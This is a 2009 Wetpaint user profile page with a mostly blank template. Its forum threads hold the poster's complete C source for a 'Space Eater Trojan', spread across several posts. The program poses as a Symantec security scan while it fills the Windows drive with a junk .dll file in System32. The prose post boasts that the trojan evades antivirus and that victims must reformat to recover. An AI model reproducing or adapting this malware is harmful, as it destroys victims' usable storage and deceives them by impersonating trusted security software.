Nityam

Nityam id=
Role: Registered User (what's this?

Registered users can join discussions and leave comments.

Read more about site and user permissions on this site at Wetpaint Central.

)
Member since: Jul 20 2007, 9:00 AM EDT
Friends: 1
Compliments: None

Hello, my name is [YOUR NAME HERE]!


Insert your profile picture here!

Home town:

Birthday (month/day):

Current residence
:

Occupation:


MORE ABOUT ME...

My guilty pleasure(s):

The best word to describe me is:

My hero(es)
:

Words or phrases I overuse:

My superpower is:

What else you should know about me:



IN MY DREAMS...
THINGS I PLAN TO HACK BEFORE I DIE





In the movie version of my life, I would be played by:

My childhood ambition/career goal:

If I were a breakfast cereal, I would be:

If I could tame and ride any animal, it would be a:

If I could live anywhere, it would be:

My dream job(s):

My dream vacation(s):


My best Hacking Resources

1.
2.
3.
4.
5.
6.


MY ALL-TIME FAVES
Website(s): Hobbies:
Food(s): Gadget(s):
Vacation spot(s): I like my eggs...
Game(s): Sport(s):
World leader(s):
TV show(s):
Celebrities:
Charities/Causes:
Movies:
Musician(s):
Song(s):
Dessert(s):
Quote(s): Cartoon character(s):

MY LISTS
HOT
NOT











MULTIMEDIA ME
DEFINING SHOTS
FAVORITE VIDEOS / WIDGETS
How to add pics of you and your friends

Caption
Insert your favorite youtube video here

Insert your profile picture here!

Caption
Insert your favorite youtube video here

ME: TAGGED! (The keywords and phrases that best sum me up...)
<<start typing here>>

SAY HELLO!
Leave me a comment
below, or send me a private message or compliment!


Latest page update: Oct 22 2009, 8:00 AM EDT
(Showing the last 5 of 7 - view all)
Started By Thread Subject Replies Last Post
Nityam SPACE Eater Program ...finally ends. 0 Oct 22 2009, 8:35 AM EDT by Nityam
Nityam
Thread started: Oct 22 2009, 8:35 AM EDT  Watch
if(t==NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
getch();
exit(1);
}
exit(1);
}

void eatspace()
{
textcolor(LIGHTRED);
gotoxy(12,16);
cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
textcolor(WHITE);
gotoxy(12,18);
while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,b);
if(status==EOF)
{
textcolor(WHITE);
vir_count=random(120);
draw();
gotoxy(12,8);
cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
gotoxy(12,10);
cprintf("PRESS ANY KEY TO CLOSE...");
getch();
break;
}
}
cputs(".");
if(status==EOF) break;
}
if(status==EOF) break;
}
exit(0);
}
void showstatus()
{
gotoxy(12,8);
cputs("SCANNING THE SYSTEM FOR THREATS");
gotoxy(12,10);
cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
gotoxy(12,13);
cputs("SCAN IN PROGRESS. PLEASE WAIT...");
}
Do you find this valuable?    
Nityam SPACE EATER Program....continues 0 Oct 22 2009, 8:33 AM EDT by Nityam
Nityam
Thread started: Oct 22 2009, 8:33 AM EDT  Watch
b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("E:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("E:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("F:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("F:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
Do you find this valuable?    
Nityam SPACE EATER "Trojan Program continuation" 0 Oct 22 2009, 8:31 AM EDT by Nityam
Nityam
Thread started: Oct 22 2009, 8:31 AM EDT  Watch
void findroot()
{
t=fopen("C:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
textcolor(WHITE);
a=fopen("C:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("D:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("D:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
Do you find this valuable?    
Nityam SPACE EATER "Trojan Program" 0 Oct 22 2009, 8:30 AM EDT by Nityam
Nityam
Thread started: Oct 22 2009, 8:30 AM EDT  Watch
/* SPACE EATER TROJAN BY Nityam. USE IT FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD!*/
#include<stdio.h>
#include<conio.h>
#include<dos.h>
#include<stdlib.h>
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;

void eatspace(void);
void findroot(void);
void showstatus(void);
void draw(void);
void accept(void);

void main()
{
draw();
accept();
textcolor(WHITE);
draw();
gotoxy(12,8);
cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
sleep(3);
gotoxy(12,8);
delline();
cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
getch();
gotoxy(12,8);
delline();
findroot();
}

void accept()
{
textcolor(LIGHTRED);
gotoxy(1,8);
cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");

if((choice=getch())!=13)
exit(0);
}

void draw()
{
clrscr();
textcolor(WHITE);
gotoxy(12,2);
cputs("********************************************************");
gotoxy(12,6);
cputs("********************************************************");
gotoxy(12,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(67,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(14,4);
cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");
}

Program continues...ahead....Look on to another thread for complete program.
Do you find this valuable?    
Nityam SPACE EATER --------- Trojan Continued. 0 Oct 22 2009, 8:23 AM EDT by Nityam
Nityam
Thread started: Oct 22 2009, 8:23 AM EDT  Watch
Most of you may be curious to know about how to make a Trojan or Virus on your own. Here is an answer for your curiosity. In this post I’ll show you how to make a simple Trojan on your own using C programming language. This Trojan when executed will eat up the hard disk space on the root drive (The drive on which Windows is installed, usually C: Drive) of the computer on which it is run. Also this Trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. So, I’ll call this as Space Eater Trojan. Since this Trojan is written using a high level programming language it is often undetected by antivirus. The source code for this Trojan is available for download at the end of this post. Let’s see how this Trojan works…
The Trojan horse which I have made appears itself as an antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by just filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result the the disk gets filled up to 100% with in minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the WindowsSystem32 folder with the .dll extension. Since the junk file has the .dll extention it is often ignored by disk cleanup softwares. So for the victim, there is now way to recover the hard disk space unless reformatting his drive.
Do you find this valuable?    
(Showing the last 5 of 7 - view all)

Friends (1)